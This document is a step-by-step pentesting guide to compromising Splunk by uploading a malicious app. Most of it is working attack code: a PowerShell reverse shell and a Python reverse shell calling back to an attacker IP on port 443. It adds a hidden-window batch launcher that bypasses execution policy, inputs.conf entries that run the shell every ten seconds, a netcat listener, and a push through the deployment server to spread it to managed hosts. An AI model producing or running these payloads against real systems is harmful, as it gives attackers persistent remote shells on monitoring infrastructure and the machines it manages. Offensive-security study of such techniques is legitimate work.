12.-Attacking-splunk

1. Create Splunk App Directory Structure

Create the necessary directory structure for the Splunk application:

mkdir -p splunk_shell/splunk_shell/bin
mkdir -p splunk_shell/splunk_shell/default
tree splunk_shell/splunk_shell/

2. Create PowerShell Reverse Shell (Windows)

Create a PowerShell script to establish a reverse shell connection:

File: splunk_shell/splunk_shell/bin/rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

3. Create a Batch File to Execute PowerShell (Windows)

File: splunk_shell/splunk_shell/bin/run.bat

@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit

4. Create Splunk App Configuration (Windows)

Configure Splunk to execute the batch file at regular intervals.

File: splunk_shell/splunk_shell/default/inputs.conf

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

5. Package the Splunk App

Create a compressed tar archive for easy deployment:

tar -cvzf updater.tar.gz splunk_shell/splunk_shell/

6. Set Up a Netcat Listener

Start a listener on port 443 to capture the reverse shell:

sudo nc -lnvp 443

7. Upload the Splunk App

1. Navigate to "Apps" -> "Manage Apps" -> "Install app from file" in Splunk Web UI.

2. Upload updater.tar.gz.

8. Create Python Reverse Shell (Linux)

For Linux systems, create a Python-based reverse shell script.

File: splunk_shell/splunk_shell/bin/rev.py

import sys, socket, os, pty

ip = "10.10.14.15"
port = 443
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

9. Create Splunk App Configuration (Linux)

File: splunk_shell/splunk_shell/default/inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

10. Deploy the App to Splunk Deployment Server

Windows Deployment Server:

Copy updater.tar.gz to the deployment apps directory:

cp updater.tar.gz $SPLUNK_HOME/etc/deployment-apps/

Restart Splunk:

splunk restart

Linux Deployment Server:

Copy updater.tar.gz to the deployment apps directory:

cp updater.tar.gz $SPLUNK_HOME/etc/deployment-apps/

Restart Splunk:

sudo systemctl restart splunk

11. Validate Shell Access

After gaining shell access, check the following:

whoami
hostname
pwd

Key Considerations

• Ensure Netcat listener is active before running the scripts.

• Modify the IP address and port in scripts based on your setup.

• Use caution when testing on production systems.

• Disable PowerShell execution policies if needed.

This guide provides a structured method for setting up a Splunk-based reverse shell for penetration testing and security research purposes.